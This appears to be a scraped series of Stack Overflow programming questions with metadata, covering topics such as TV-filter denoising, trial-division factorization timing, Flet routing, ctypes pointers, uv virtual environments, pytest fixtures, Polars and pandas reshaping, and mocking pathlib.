axes[1,2].plot(weights, metrics['entropy'], 'm-',
label='Entropy (masked region)')
axes[1,2].set_xlabel('Weight')
axes[1,2].set_ylabel('Entropy')
axes[1,2].legend()
plt.suptitle(f'multiplier={multiplier}')
plt.tight_layout()
plt.show()
return optimal_weight, {
'weights': weights,
'metrics': metrics,
'denoised_images': denoised_images,
'mask': mask
}
def generate_test_data(size=100, noise_level=0.1, wind_direction=45, wind_speed=1.0):
"""
Generate synthetic test data with a realistic gas plume
Parameters:
-----------
size : int
Size of the output image (size x size)
noise_level : float
Standard deviation of the background noise
wind_direction : float
Wind direction in degrees (0 is East, 90 is North)
wind_speed : float
Relative wind speed affecting plume spread
Returns:
--------
test_image : 2D numpy array
Normalized image containing background noise and plume
"""
# Create background noise
background = np.random.normal(0, noise_level, (size, size))
# Create coordinate grid
x, y = np.meshgrid(np.linspace(-2, 2, size), np.linspace(-2, 2, size))
# Convert wind direction to radians and calculate rotated coordinates
theta = np.radians(wind_direction)
x_rot = x * np.cos(theta) + y * np.sin(theta)
y_rot = -x * np.sin(theta) + y * np.cos(theta)
# Create elongated plume shape
# Higher wind_speed creates more elongated plume
sigma_x = 0.8 * wind_speed # Spread in wind direction
sigma_y = 0.2 # Spread perpendicular to wind direction
# Add turbulent diffusion effect
turbulence = np.random.normal(0, 0.1, (size, size))
# Calculate plume concentration with gaussian dispersion model
plume = np.exp(-(x_rot**2/(2*sigma_x**2) + y_rot**2/(2*sigma_y**2)))
# Add some random variations to make it more realistic
plume = plume * (1 + 0.2 * turbulence)
# Add source point with higher concentration
source_x = size // 4
source_y = size // 2
plume[source_y-2:source_y+2, source_x-2:source_x+2] = 1.0
# Combine background and plume
test_image = background + plume
# Add some patchiness to the plume
patchiness = np.random.normal(0, 0.05, (size, size))
test_image = test_image * (1 + patchiness * (plume > 0.1))
# Normalize to 0-1 range
test_image = (test_image - test_image.min()) / (test_image.max() - test_image.min())
return test_image
# Generate test data with different wind conditions
test_image = generate_test_data(
size=100,
noise_level=0.1,
wind_direction=45, # 45 degree wind direction
wind_speed=1.5 # Moderate wind speed
)
multiplier = 2
# Find optimal weight and denoise
optimal_weight, results = tune_tv_chambolle(
test_image,
lower_quantile=0.2,
upper_quantile=0.8,
n_weights=15,
multiplier=multiplier,
)
# Apply final denoising with optimal weight
final_denoised = denoise_tv_chambolle(test_image, weight=optimal_weight,
channel_axis=None,
)
# Compare original vs denoised for masked region
mask = results['mask']
original_std = np.std(test_image[mask])
denoised_std = np.std(final_denoised[mask])
noise_reduction = (1 - denoised_std/original_std) * 100
print(f"Optimal weight: {optimal_weight:.4f}")
print(f"Noise reduction in masked region: {noise_reduction:.1f}%")
</code></pre>
<p>Here're some results using different weight_max of TV filter</p>
<h3>weight_max = noise_std*2</h3>
<p>Optimal weight: 0.0572
Noise reduction in masked region: 20.8%</p>
<p><a href="https://i.sstatic.net/jthB067F.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/jthB067F.png" alt="multiple2" /></a></p>
<h3>weight_max = noise_std*3</h3>
<p>Optimal weight: 0.0259
Noise reduction in masked region: 24.9%</p>
<p><a href="https://i.sstatic.net/z8eM2E5n.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/z8eM2E5n.png" alt="std3" /></a></p>
<h3>weight_max = noise_std*4</h3>
<p>Optimal weight: 0.0436
Noise reduction in masked region: 25.2%</p>
<p><a href="https://i.sstatic.net/oJ2BCjNA.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/oJ2BCjNA.png" alt="std4" /></a></p>
<h3>Question</h3>
<p>It seems <code>noise_std*3</code> gets the wrong optimal weight according to the image. How to set a correct weight range to get the optimalized TV filter?</p>
|
<python><numpy><image-processing><scikit-image><smoothing>
|
2025-01-17 18:15:43
| 1
| 1,039
|
zxdawn
|
79,365,706
| 16,383,578
|
Why factorization of products of close primes is much slower than products of dissimilar primes
|
<p>This is a purely academic question without any practical consideration. This is not homework, I dropped out of high school long ago. I am just curious, and I can't sleep well without knowing why.</p>
<p>I was messing around with Python. I decided to factorize big integers and measure the runtime of calls for each input.</p>
<p>I used a bunch of numbers and found that some numbers take much longer to factorize than others.</p>
<p>I then decided to investigate further, I quickly wrote a prime sieve function to generate primes for testing. I found out that a product of a pair of moderately large primes (two four-digit primes) take much longer to be factorized than a product of one very large prime (six-digits+) and a small prime (<=three-digits).</p>
<p>At first I thought my first simple function for testing is inefficient, that is indeed the case, so I wrote a second function that pulled primes directly from pre-generated list of primes, the second function was indeed more efficient, but strangely it exhibits the same pattern.</p>
<p>Here are some numbers that I used:</p>
<pre><code>13717421 == 3607 * 3803
13189903 == 3593 * 3671
56267023 == 7187 * 7829
65415743 == 8087 * 8089
12345679 == 37 * 333667
38760793 == 37 * 1047589
158202851 == 151 * 1047701
762312571 == 727 * 1048573
</code></pre>
<p>Code:</p>
<pre><code>import numpy as np
from itertools import cycle
def factorize(n):
factors = []
while not n % 2:
factors.append(2)
n //= 2
i = 3
while i**2 <= n:
while not n % i:
factors.append(i)
n //= i
i += 2
return factors if n == 1 else factors + [n]
TRIPLE = ((4, 2), (9, 6), (25, 10))
WHEEL = ( 4, 2, 4, 2, 4, 6, 2, 6 )
def prime_sieve(n):
primes = np.ones(n + 1, dtype=bool)
primes[:2] = False
for square, double in TRIPLE:
primes[square::double] = False
wheel = cycle(WHEEL)
k = 7
while (square := k**2) <= n:
if primes[k]:
primes[square::2*k] = False
k += next(wheel)
return np.flatnonzero(primes)
PRIMES = list(map(int, prime_sieve(1048576)))
TEST_LIMIT = PRIMES[-1] ** 2
def factorize_sieve(n):
if n > TEST_LIMIT:
raise ValueError('Number too large')
factors = []
for p in PRIMES:
if p**2 > n:
break
while not n % p:
factors.append(p)
n //= p
return factors if n == 1 else factors + [n]
</code></pre>
<p>Test result:</p>
<pre><code>In [2]: %timeit factorize(13717421)
279 μs ± 4.29 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each)
In [3]: %timeit factorize(12345679)
39.6 μs ± 749 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [4]: %timeit factorize_sieve(13717421)
64.1 μs ± 688 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [5]: %timeit factorize_sieve(12345679)
12.6 μs ± 146 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each)
In [6]: %timeit factorize_sieve(13189903)
64.6 μs ± 964 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [7]: %timeit factorize_sieve(56267023)
117 μs ± 3.88 μs per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [8]: %timeit factorize_sieve(65415743)
130 μs ± 1.38 μs per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [9]: %timeit factorize_sieve(38760793)
21.1 μs ± 232 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [10]: %timeit factorize_sieve(158202851)
21.4 μs ± 385 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [11]: %timeit factorize_sieve(762312571)
22.1 μs ± 409 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
</code></pre>
<p>As you can clearly see, factorization of two medium primes on average takes much longer than two extremes. Why is it this case?</p>
|
<python><algorithm>
|
2025-01-17 17:58:27
| 2
| 3,930
|
Ξένη Γήινος
|
79,365,583
| 7,334,203
|
Python library that takes as input a complex XSD and outputs the an XML
|
<p>I know my question is not crystal clear but i'd like to find a robust and reliable python library that is taking as input a complex Xml Schema Definition file and produces the an XML file. For example i have this XSD:</p>
<pre><code> <xsd:schema xmlns:stf="urn" xmlns:xsd="http://www.w3.org/2001/XMLSchema" targetNamespace="urn" elementFormDefault="qualified" attributeFormDefault="unqualified" version="1.0">
<!-- Kind of Name -->
<xsd:simpleType name="NameType_EnumType">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OECD201"/>
<xsd:enumeration value="OECD202"/>
<xsd:enumeration value="OECD203"/>
<xsd:enumeration value="OECD204"/>
<xsd:enumeration value="OECD205"/>
<xsd:enumeration value="OECD206"/>
<xsd:enumeration value="OECD207"/>
<xsd:enumeration value="OECD208"/>
</xsd:restriction>
</xsd:simpleType>
<!-- -->
</xsd:schema>
</code></pre>
<p>How can with this XSD as input produce an XML?
The data will be populated from a table. Most likely, they will be spark dataframes</p>
|
<python><xml><xsd>
|
2025-01-17 17:16:20
| 0
| 7,486
|
RamAlx
|
79,365,487
| 9,983,652
|
replace string in a text file with different replacement scenarios
|
<p>I have a text file and I need to replace the value after <code>*</code> under different scenarios. For example, in below data like <code>12*5 7*7 39*8</code>, I need to replace them to become <code>12*1000 7*2000 39*3000</code>. It means if the value after <code>*</code> is 5, it is replaced by 1000, if the value is 7, it is replaced by 2000, if the value is 8, it is replaced by 3000.</p>
<p>I made some codes, like theses, doesn't work efficiently, so I have to work with each number and there do some errors and I don't know where?</p>
<p>Any idea to make it work?</p>
<pre><code>import re
file='input.txt'
file_write='output.txt'
def replace_string_cases_usename(item):
pattern_general=r"(?P<num>\d+)\*(?P<perm>\d+)"
result=re.findall(pattern_general,item)[0]
str_perm=result[1]
str_num=result[0]
# str_perm=result.group('perm')
print('found str perm is ',str_perm)
if str_perm=='5':
result_replaced=re.sub(pattern_general,'\g<num>*1000',item) # use \g<num> outside the pattern to refer to searching string
elif str_perm=='7':
result_replaced=re.sub(pattern_general,'\g<num>*2000',item)
elif str_perm=='8':
result_replaced=re.sub(pattern_general,'\g<num>*3000',item)
else:
result_replaced=re.sub(pattern_general,'\g<num>*4000',item)
print('original=',item)
print('fixed=',result_replaced)
(result_replaced,str_num)
saved_list_all_lines=[]
with open(file,'r') as infile:
all_lines=infile.readlines()
i=0
x_item=0
x_item_single=0
for line in all_lines:
i+=1
# print('line=',i)
saved_list_this_line=[]
line1=line.strip() # strip both leading and tailing white space
item_list=line1.split(' ')
for item in item_list:
# print(item)
if '*' in item:
(result_replaced,str_num)=replace_string_cases_usename(item)
saved_list_this_line.append(result_replaced)
x_item+=int(float(str_num))
else:
print('single item is',item)
x_item_single+=1
result_replaced=replace_string_cases_singlenum(item)
saved_list_this_line.append(result_replaced)
x_item+=1
# saved_list_this_line.append(item) # testing without replace
# add line return at the end
saved_list_this_line.append('\n')
#join all the string into a big string to represent one line
str_thisline=' '.join(saved_list_this_line)
print('This line string are ',str_thisline)
#save this line big string into the other list
saved_list_all_lines.append(str_thisline)
print('Total num of items is ',x_item)
print('The num of single items is ',x_item_single)
print('Final String are ',saved_list_all_lines)
#now need to write saved data back to another file
with open(file_write,'w') as outfile:
for str_line in saved_list_all_lines:
outfile.write(str_line)
12*5 7*7 39*8 255 10*5 39*4 74*3 83*255 31*2 22*3 2*4 3 10*5 6*7 38*8 255 10*5 39*4 69*3 95*255 20*2 22*3 4 4*3 4 9*5 6*7 40*8 255 12*5 39*4 56*3 103*255 18*2 22*3 4 2*3 4 5 4 11*5 5*7 44*8 255 18*5 34*4 50*3 108*255 17*2 18*3 4 2*3 3*4 13*5 4*7 48*8 25*5 31*4 43*3 112*255 17*2 18*3 4*4 5 4 11*5 4*7 50*8 2*6 25*5 31*4 35*3 119*255 13*2 21*3 6*4 12*5 3*7 50*8 99*255 37*3 4 4*3 6*4 4*5 4 55*5 14*3 5 4*3 5 4*3 7 2*3 7 8 7 27*8 52*9 98*255 34*3 11*4 81*5
7*7 8 7 18*8 66*9 93*255 36*3 9*4 79*5 6 3*7 6 7*7 16*8 63*9 9*11
</code></pre>
|
<python>
|
2025-01-17 16:42:13
| 1
| 4,338
|
roudan
|
79,365,404
| 16,389,095
|
How to display two different views into main page
|
<p>I developed a simple app with two different views, each one defined into two different classes. When I try to add the first one to the page, I get an error into the app window: <strong>"Unknown control view"</strong>. Here is the code:</p>
<pre><code>import flet as ft
import time
class WelcomeView(ft.View):
def __init__(self, window_width, window_height, login_on_click, route):
super().__init__()
self.window_width = window_width
self.window_height = window_height
self.login_on_click = login_on_click
self.route = route
def update_layout(self):
"""
Updates the layout by incrementally changing the progress bar value and updating the background color of the
top container and the login button every 10% of progress.
This function iterates from 0 to 100, updating the progress bar's value and sleeping for 0.05 seconds
between each increment. When the progress reaches a multiple of 10, it changes the background color of
the top container and the login button based on a predefined list of green shades. After reaching 100%,
it resets the progress.
"""
colors = [ft.colors.GREEN_50, ft.colors.GREEN_100, ft.colors.GREEN_200, ft.colors.GREEN_300, ft.colors.GREEN_400, ft.colors.GREEN_500, ft.colors.GREEN_600, ft.colors.GREEN_700, ft.colors.GREEN_800, ft.colors.GREEN_900]
val=0
while val < 101:
self.pb.value = val * 0.01
time.sleep(0.05)
#update container bgcolor every 10%
mod = val % 10
if mod == 0.0:
self.topContainer.bgcolor = colors[int(val/10) - 1]
self.loginButton.style = ft.ButtonStyle(bgcolor=colors[int(val/10) - 1])
#update val value
val += 1
if val == 100:
val=0
#update the page
self.update()
def did_mount(self):
self.update_layout()
def build(self):
self.topContainer = ft.Container(
bgcolor=ft.colors.GREEN,
width=self.window_width,
height=self.window_height * 0.25,
)
self.pb = ft.ProgressBar()
self.loginButton=ft.FilledButton(text="LOGIN", on_click = self.login_on_click)
self.bottomContainer = ft.Container(
width=self.window_width,
height=self.window_height * 0.75,
content=ft.Column(
[self.loginButton],
alignment="CENTER",
horizontal_alignment="CENTER",
),
)
view = ft.View(
route=self.route,
padding=0,
horizontal_alignment="center",
vertical_alignment="top",
controls=[ft.Column([self.topContainer, self.pb, self.bottomContainer], spacing=0,)],
# theme=ft.Theme(color_scheme_seed = ft.colors.GREEN),
# theme_mode="light",
)
return view
class LoginView(ft.View):
def __init__(self, window_width, window_height, route, on_click):
super().__init__()
self.window_width = window_width
self.window_height = window_height
self.route = route
self.back_on_click = on_click
def build(self):
view = ft.View(
route=self.route,
padding=0,
horizontal_alignment="center",
vertical_alignment="top",
controls=[ft.Column([ft.FilledButton(text="BACK", on_click=self.back_on_click)], )],
# theme=ft.Theme(color_scheme_seed = ft.colors.GREEN),
# theme_mode="light",
)
return view
def main(page: ft.Page):
def route_change(route):
page.views.clear()
page.views.append(welcome_view)
if page.route == "/login_view":
page.views.append(login_view)
page.update()
def view_pop(view):
if page.route == "/login_view":
page.go("/")
page.theme = ft.Theme(color_scheme_seed = ft.colors.GREEN) #BLUE_200
page.theme_mode = "light"
page.window_height = 700
page.window_width = 400
page.window_resizable = False
page.window_maximizable = False
page.title = "Mobile App UI Example"
welcome_view = WelcomeView(window_height=page.window_width,
window_width=page.window_height,
route="/",
login_on_click=lambda _: page.go("/login_view"),
)
login_view = LoginView(window_height=page.window_width,
window_width=page.window_height,
route="/login_view",
on_click=lambda _: page.go("/")
)
page.on_route_change = route_change
page.on_view_pop = view_pop
page.go(page.route)
ft.app(target=main, assets_dir="assets")
</code></pre>
<p>Could someone give some hints about performing routing with views defined outside the main function? Thank you</p>
|
<python><flutter><flet>
|
2025-01-17 16:12:51
| 1
| 421
|
eljamba
|
79,365,281
| 3,336,423
|
How to correctly initialize ctypes char***?
|
<p>I'm using <code>ctype</code> to call C code from Python.</p>
<p>The C function I need to call takes a <code>char***</code>, and so it's bind as using a <code>ctypes.POINTER(ctypes.POINTER(ctypes.c_char))</code>.</p>
<p>I don't understand how I should safely create and initialize such objects, because if I create one and immediatly try to iterate it, the Python program crashs:</p>
<pre><code>import ctypes
names = ctypes.POINTER(ctypes.POINTER(ctypes.c_char))()
if names != None:
for name in names:
pass
</code></pre>
<p>Error is:</p>
<pre><code>Traceback (most recent call last):
File "example_sdetests_lib_bind_python_string_array.py", line 6, in <module>
for name in names:
ValueError: NULL pointer access
</code></pre>
<p>How can I safely check a <code>ctypes.POINTER(ctypes.POINTER(ctypes.c_char))</code> is NULL or not?</p>
|
<python><ctypes><python-bindings>
|
2025-01-17 15:33:22
| 1
| 21,904
|
jpo38
|
79,365,086
| 1,192,393
|
Can I have different virtual environments in a project managed by uv?
|
<p>On a Windows machine, I'm developing a Python project that I manage using <code>uv</code>. I run the unit tests with <code>uv run pytest</code>, and <code>uv</code> automatically creates a virtual environment in <code>.venv</code>. So far, so good.</p>
<p>But every now and then, I want to run the unit tests - or other commands - in Linux (from the same project source directory). In my case, this means WSL, but it could also be a VM using a shared folder or a network share. The problem is that the virtual environment is platform specific, so <code>uv run pytest</code> reports an error that the virtual environment is invalid.</p>
<p><strong>Is it possible to configure <code>uv</code> to use a different name for the project's virtual environment - e. g., <code>.venv_linux</code>?</strong></p>
<p>As a workaround, I could move the <code>.venv</code> folder out of the way and let <code>uv</code> on Linux create its own <code>.venv</code>. But I'd have to do that every time I switch between the two, and that would be cumbersome. I also couldn't do this while a command from the project is still running.</p>
|
<python><python-venv><uv>
|
2025-01-17 14:37:02
| 2
| 411
|
Martin
|
79,365,048
| 7,007,547
|
How to get the Exception (Message and StackStrace) of a Python Azure Function
|
<p>With the following AzureFunction (<code>config.nonsense</code> is not defined):</p>
<pre><code>import azure.functions as func
import logging
import zsbiconfig
# import triggerfunc
app = func.FunctionApp()
@app.timer_trigger(schedule="0 */1 * * * *", arg_name="myTimer", run_on_startup=True,
use_monitor=False)
def zsdbi(myTimer: func.TimerRequest) -> None:
if myTimer.past_due:
logging.info('The timer is past due!')
logging.info('27 Python timer trigger function executed.')
config = zsbiconfig.MyConfig(azure=True)
print('config.ftp_host:', config.ftp_host)
print('config.ftp_username:', config.ftp_username)
print('config.ftp_password:', config.ftp_password)
print('config.ftp_nonsense:', config.nonsense) # I will produce a Exception
# err = triggerfunc.triggerfunc(config)
return
</code></pre>
<p>I produce the following Error (Shown here is the Monitoring LogStream):</p>
<pre><code>2025-01-17T13:45:00Z [Verbose] Sending invocation id: 'f65a61af-e12a-4bfe-8bd2-7e30fee4eede
2025-01-17T13:45:00Z [Verbose] Posting invocation id:f65a61af-e12a-4bfe-8bd2-7e30fee4eede on workerId:3ec07702-7f0c-4a61-a0e7-57e542651161
2025-01-17T13:45:00Z [Information] 27 Python timer trigger function executed.
2025-01-17T13:45:00Z [Error] Executed 'Functions.zsdbi' (Failed, Id=f65a61af-e12a-4bfe-8bd2-7e30fee4eede, Duration=9ms)
</code></pre>
<p>I cannot figure our how to get the full Stacktrace and ErrorMessage of this Exception in Application Insights. Here is my host.json :</p>
<pre><code> "version": "2.0",
"logging": {
"applicationInsights": {
"samplingSettings": {
"isEnabled": true,
"excludedTypes": "Request"
}
}
},
"extensionBundle": {
"id": "Microsoft.Azure.Functions.ExtensionBundle",
"version": "[4.*, 5.0.0)"
}
}
</code></pre>
<p><strong>Edit 1 <code>zsbiconfig.py</code></strong></p>
<pre><code>import os
# from azure.identity import DefaultAzureCredential
# from azure.keyvault.secrets import SecretClient
class MyConfig:
def __init__(self, ftp_host=None, ftp_username=None, ftp_password=None,
sharepoint_url=None, sharepoint_clientid=None, sharepoint_clientsecret=None, azure=False):
self._ftp_host = ftp_host
self._ftp_username = ftp_username
self._ftp_password = ftp_password
self._sharepoint_url = sharepoint_url
self._sharepoint_clientid = sharepoint_clientid
self._sharepoint_clientsecret = sharepoint_clientsecret
self._azure = azure
self._env_ftp_host = os.getenv('FTP_HOST')
self._env_ftp_username = os.getenv('FTP_USERNAME')
self._env_ftp_password = os.getenv('FTP_PASSWORD')
self._env_sharepoint_url = os.getenv('SHAREPOINT_URL')
self._env_sharepoint_clientid = os.getenv('SHAREPOINT_CLIENTID')
self._env_sharepoint_clientsecret = os.getenv('SHAREPOINT_CLIENTSECRET')
return
</code></pre>
|
<python><azure-functions><azure-application-insights>
|
2025-01-17 14:24:07
| 1
| 1,140
|
mbieren
|
79,365,034
| 13,175,203
|
How to recycle a list to build a new column in Polars?
|
<p>How can I create the <code>type</code> column recycling a two-elements list <code>["lat","lon"]</code>?</p>
<div class="s-table-container"><table class="s-table">
<thead>
<tr>
<th>adresse</th>
<th>coord</th>
<th>type</th>
</tr>
</thead>
<tbody>
<tr>
<td>"place 1"</td>
<td>48.943837</td>
<td><strong>lat</strong></td>
</tr>
<tr>
<td>"place 1"</td>
<td>2.387917</td>
<td><strong>lon</strong></td>
</tr>
<tr>
<td>"place 2"</td>
<td>37.843837</td>
<td><strong>lat</strong></td>
</tr>
<tr>
<td>"place 2"</td>
<td>6.387917</td>
<td><strong>lon</strong></td>
</tr>
</tbody>
</table></div>
<p>As it would be automatically done in R with <code>d$type <- c("lat","lon")</code></p>
<p>Reprex :</p>
<pre class="lang-py prettyprint-override"><code>import polars as pl
d0 = pl.DataFrame(
{
"adresse": ["place 1", "place 2"],
"coord": [[48.943837, 2.387917], [37.843837, 6.387917]],
}
)
d1 = d0.explode("coord")
</code></pre>
<p>What I tried:</p>
<pre class="lang-py prettyprint-override"><code>d1 = d1.with_columns(type=pl.Series(["1","2"]))
# ShapeError: unable to add a column of length 2 to a DataFrame of height 4
d1 = d1.join(pl.DataFrame({"id":["1", "2"]}), how="cross")
# logically, 8 rows instead of 4
</code></pre>
|
<python><dataframe><python-polars>
|
2025-01-17 14:20:56
| 3
| 491
|
Samuel Allain
|
79,364,990
| 10,691,106
|
Specifying a relationship between *args of *Ts and *args of type[T] over Ts?
|
<p>Consider the following example:</p>
<pre class="lang-py prettyprint-override"><code>class Example:
def __init__(self, *arg_types) -> None:
...
def do_work(self, *arg_values) -> Any:
...
</code></pre>
<p>In this demo, <code>arg_types</code> is some list of object types. For example, I might instantiate:</p>
<pre class="lang-py prettyprint-override"><code>myEx = Example(int, str)
</code></pre>
<p>I would then expect that <code>do_work</code> expects one integer and one string:</p>
<pre class="lang-py prettyprint-override"><code>myEx.do_work(42, "forty two")
</code></pre>
<p>and that <code>myEx</code> is of type <code>Example[int, str]</code>.</p>
<p>My initial attempt gave something like</p>
<pre class="lang-py prettyprint-override"><code>class Example[*Ts]:
def __init__(self, *arg_type: *Ts) -> None:
...
def do_work(self, *arg_values: *Ts) -> Any:
...
</code></pre>
<p>However, this has the obvious issue that, by continuing the example above, <code>myEx.do_work(42, "forty two")</code> gives an error, as <code>42</code> is <code>int</code> and not <code>type[int]</code>, and similarly for the string argument.</p>
<p>I have had to so a bit of varadic type hinting in the past, but this one doesn't seem possible to express in the type hinting python can provide.</p>
<p>Is there a way to do this?</p>
<hr />
<p>Minor edit:</p>
<p>I should also specify that I explored attempting some kind of type alias</p>
<pre><code>type TypeT[T] = type[T]
</code></pre>
<p>and then parameterising my class on T. However, based on how <code>TypeVarTuple</code>s works, each <code>*arg</code> would need to be the same <code>T</code>, which is where the complication arises.</p>
|
<python><python-typing>
|
2025-01-17 14:06:31
| 0
| 339
|
TimeTravelPenguin
|
79,364,926
| 2,302,262
|
aggregate or split pytest fixtures
|
<p>Two related <code>pytest</code> questions:</p>
<h1>Split fixture into individual values</h1>
<p>I have a fixture which is an iterable and which is tested in a certain test. This works. However, I also have a test which wants to test the individual values - I don't know how to do this.</p>
<p>For example, how can I write the <code>student</code> fixture such that it returns each of the elements of <code>klass</code>?</p>
<pre class="lang-py prettyprint-override"><code>@pytest.fixture
def klass() -> list[str]:
return ['alice', 'bob', 'claire']
@pytest.fixture
def student(klass) -> str: # HERE IS THE QUESTION
#code that returns each student in the klass individually
def test_klass(klass): # ran once
assert len(klass) > 0
def test_student(student): # ran 3 times
assert isinstance(student, str)
</code></pre>
<h1>Combine individual fixture values into single fixture</h1>
<p>The inverse problem occurs if I want to specify the students and combine them into a klass (the same test functions apply as above):</p>
<pre class="lang-py prettyprint-override"><code>@pytest.fixture(params = ['alice', 'bob', 'claire'])
def student(request) -> str:
return request.param
@pytest.fixture
def klass(student) -> list[str]: # HERE IS THE QUESTION
#code that returns the list with all values for student
</code></pre>
|
<python><pytest>
|
2025-01-17 13:41:02
| 1
| 2,294
|
ElRudi
|
79,364,853
| 15,001,463
|
Inheriting from too many abstract classes?
|
<p>I am trying to apply the <a href="https://en.wikipedia.org/wiki/Don%27t_repeat_yourself" rel="nofollow noreferrer">DRY</a> principle to toy plotting classes as an intellectual exercise for improving my understanding of OOP (currently reading <a href="https://rads.stackoverflow.com/amzn/click/com/1801077266" rel="nofollow noreferrer" rel="nofollow noreferrer">Python Object Oriented programming</a>), but intuitively it seems like the use of a potentially increasingly deep inheritance hierarchy might lead to more complicated code base (especially since I have read that composition seems to be favored over inheritance, see <a href="https://en.wikipedia.org/wiki/Composition_over_inheritance" rel="nofollow noreferrer">Composition over inheritance wiki</a>). It seems like such a toy library could potentially end up with wayyyyy too many abstract classes like <code>AbstractMonthlyMultiPanelPlot</code> or <code>AbstractSeasonalPlot</code> so on and so forth for arbitrary plot types to accommodate different input data.</p>
<p>Is there a more pythonic way about handling the below problem that perhaps I am missing? Am I violating some sort of design principle that I have either mis-interpreted or perhaps just completely missed?</p>
<pre class="lang-py prettyprint-override"><code>from abc import abstractmethod, ABC
from numpy import ndarray
from typing import List, Tuple
import matplotlib.pyplot as plt
class AbstractPlot(ABC)
@abstractmethod
def plot(self):
raise NotImplementedError
class AbstractMonthlyPlot(AbstractPlot):
@abstractmethod
def plot_for_month(ax, data):
raise NotImplementedError
@property
def n_months(self):
"""number of months in a year"""
return 12
def plot(self, month_to_data: List[Tuple[ndarray]]):
fig, axs = plt.subplots(self.n_months, 1)
for month in range(self.n_months):
self._plot_for_month(ax=axs[month], data=month_to_data[month])
class Contour(AbstractMonthlyPlot):
def _plot_for_month(self, ax, data):
ax.contourf(*data)
class Linear(AbstractMonthlyPlot):
def _plot_for_month(self, ax, data):
ax.plot(*data)
</code></pre>
|
<python><oop>
|
2025-01-17 13:10:17
| 1
| 714
|
Jared
|
79,364,747
| 7,766,158
|
pre-commit fails with ModuleNotFoundError: No module named 'yaml'
|
<p>I am using pre-commit. In one of the hooks, I use a python script that imports the <code>yaml</code> library.</p>
<p>However, when I try to commit something, I get the following error on this hook :</p>
<pre><code>ModuleNotFoundError: No module named 'yaml'
</code></pre>
<p>I don't understand what is the issue here as <code>pyyaml</code> is properly found in python</p>
<pre><code>$ python3
Python 3.12.3 (main, Nov 6 2024, 18:32:19) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import yaml
>>>
</code></pre>
<p>Here is my .pre-commit-config.yml :</p>
<pre><code>repos:
# python hooks
- repo: local
hooks:
- id: yaml-arrays-sort
name: YAML Arrays Sort
description: Sort arrays in YAML files
entry: python scripts/yaml-arrays-sort.py
pass_filenames: false
language: python
</code></pre>
|
<python><pre-commit-hook><pre-commit><pre-commit.com>
|
2025-01-17 12:25:12
| 1
| 1,931
|
Nakeuh
|
79,364,688
| 5,775,358
|
pytest mock two instances of pathlib
|
<p>I have the following function which I want to test. I do not want to use <code>tmp_path</code> so I try to mock everything, using pytest-mock.</p>
<pre class="lang-py prettyprint-override"><code>import pytest
import pathlib
class SecondFileError(Exception):
def __init__(self, message):
super().__init__(message)
def check_files(file: pathlib.Path) -> tuple[pathlib.Path, pathlib.Path]:
# check if file exists:
if not file.exists():
raise FileNotFoundError(f"File {file} does not exist")
# second file (these files should always be together)
second_file = file.parent / f"{file.stem}_second{file.suffix}"
if not second_file.exists():
raise SecondFileError(f"{second_file} not found")
return (file, second_file)
def test_check_file_correct(mocker):
file = pathlib.Path("test.txt")
second_file = pathlib.Path("test_second.txt")
mocker.patch("pathlib.Path.exists", return_value=True)
res = check_files(file)
assert res[0] == file
assert res[1] == second_file
def test_check_no_file(mocker):
file = pathlib.Path("test.txt")
mocker.patch("pathlib.Path.exists", return_value=False)
with pytest.raises(FileNotFoundError):
check_files(file)
</code></pre>
<p>This works fine, I would like to test the case where only the file exists, without the second file.</p>
<p>What I tried is this:</p>
<pre><code>def test_with_file_without_second_file(mocker):
file = pathlib.Path("test.txt")
file.exists = mocker.MagicMock(exists=True)
with pytest.raises(SecondFileError):
check_files(file)
>>> AttributeError: 'WindowsPath' object attribute 'exists' is read-only
def test_with_file_without_second_file(mocker):
file = pathlib.Path("test.txt")
# file.exists = mocker.MagicMock(exists=True)
mock_exists = mocker.patch.object(file, "exists", return_value=True)
with pytest.raises(SecondFileError):
check_files(file)
>>> AttributeError: 'WindowsPath' object attribute 'exists' is read-only
def test_with_file_without_second_file(mocker):
file = pathlib.Path("test.txt")
mocker.patch.object(
file,
"__getattr__",
side_effect=lambda attr: True if attr == "exists" else AttributeError,
)
with pytest.raises(SecondFileError):
check_files(file)
>>> AttributeError: test.txt does not have the attribute '__getattr__'
</code></pre>
<p>And a lot other options, but it all circles down to the read-only error. A lot of examples on the internet show how to set the function of the class to true, but I would like to mock it on an instance of the <code>pathlib.Path</code> class.</p>
|
<python><mocking><pytest><pathlib><pytest-mock>
|
2025-01-17 12:00:01
| 0
| 2,406
|
3dSpatialUser
|
79,364,551
| 7,959,614
|
How to subtract pd.DataFrameGroupBy-objects from each other
|
<p>I have the following <code>pd.DataFrame</code></p>
<pre><code>match_id player_id round points A B C D E
5890 3750 1 10 0 0 0 3 1
5890 3750 2 10 0 0 0 1 0
5890 3750 3 10 0 8 0 0 1
5890 2366 1 9 0 0 0 5 0
5890 2366 2 9 0 0 0 5 0
5890 2366 3 9 0 0 0 2 0
</code></pre>
<p>I want to subtract the values of A, B, C, D and E of the two players and create two new columns that represent the number of points of the two players.</p>
<p>My desired output looks as follows:</p>
<pre><code>match_id round points_home points_away A B C D E
5890 1 10 9 0 0 0 -2 1
5890 2 10 9 0 0 0 -4 0
5890 3 10 9 0 8 0 -2 1
</code></pre>
<p>Please advice</p>
|
<python><pandas>
|
2025-01-17 11:05:08
| 1
| 406
|
HJA24
|
79,364,440
| 7,677,894
|
How to achieve unequal stride of dw-conv with equal stride dw-conv?
|
<p>Seems like unequal height and width of stride in <code>tf.nn.depthwise_conv</code> is not supported. Can I do that in form of equal stride with any other layer operations?</p>
|
<python><tensorflow><deep-learning>
|
2025-01-17 10:28:10
| 0
| 983
|
Ink
|
79,364,338
| 2,859,206
|
How to label or rename bin ranges in a series output from value count
|
